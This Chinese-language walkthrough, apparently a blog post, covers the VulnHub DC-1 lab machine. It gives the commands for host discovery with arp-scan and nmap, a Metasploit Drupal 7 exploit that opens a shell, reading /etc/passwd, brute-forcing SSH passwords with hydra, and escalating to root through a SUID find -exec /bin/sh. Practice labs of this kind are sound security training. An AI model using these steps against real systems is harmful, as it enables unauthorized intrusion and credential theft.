环境
kali linux 和 DC-1 都是搭建在VMware上的虚拟机,都是NAT模式。
NAT模式下虚拟机没有被分配真实的ip地址,他们通过共享宿主机的ip地址访问互联网。我们可以通过它的MAC地址00:0C:29:23:E2:8D查到宿主机分配给他的虚拟ip。
arp-scan -l=>192.168.62.134
还有另一种方法,假设我们已经和目标在同一个局域网下:
ip addr
查到当前所在网段 192.168.62.135\24
前24位为网络号(192.168.62),最后8位是主机号(135)
nmap -sP 192.168.62.0/24
nmap -sV -p- 192.168.62.134
-sV 主机安装的软件版本
-p- 扫描0~65535范围端口
可看到80端口开启,我们在浏览器访问
我们看到网站用的是Drupal 7
一款WebApp,挺牛的由很多web专家一起开发维护的。
Wappalyzer是网站指纹工具,可在火狐插件中安装。
search drupal
选择漏洞,并查看需要配置的参数
use 4
show options
set rhost 192.168.62.134
run
出现meterpreter说明攻击成功,shell可获得终端
shell
cat flag1.txt
没什么用...
查看passwd文件中记录的用户信息
cat /etc/passwd
1 用户名
2 密码(x表示密码被加密存储在 /etc/shadow 文件中)
3 用户id(0 :root, 1~99:其他用户, 100~999系统保留)
4 用户组id (保存在 /etc/group 文件中)
5 备注
6 用户登录时所在的绝对路径
7 命令路径
cat /etc/passwd发现没有权限访问,如果可的话,就能使用John the Ripper来破解密码啦
flag4这个用户名一听就很有前途哈哈。。
hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.62.134
-l 指定用户名
-P 密码字典(这里使用的是john安装后自带的,kali中在/usr/share/john目录下)
-ssh://ip 指定使用的协议和ip
破解成功,密码orange
ssh username@ip
flag4不是最终的flag, 最终的flag在root目录下。
如何拥有root权限:
1.root用户登录
再来一次爆破...
hydra -l root -P /usr/share/john/password.lst ssh://192.168.62.134
失败...
2.普通用户登录
利用有suid权限位的命令获得权限
suid权限位:可以以root权限执行命令
find / -type f -perm -u=s 2>/dev/null
发现 find 命令被设置为了suid权限
用-exec实现两个命令的连接
find / -type -f -name test -exec "whoami" \;
find / -type -f -name test -exec "/bin/sh" \;
(test 是我事先创建的)
原文:https://www.cnblogs.com/hugboy/p/vulnhub_dc1.html
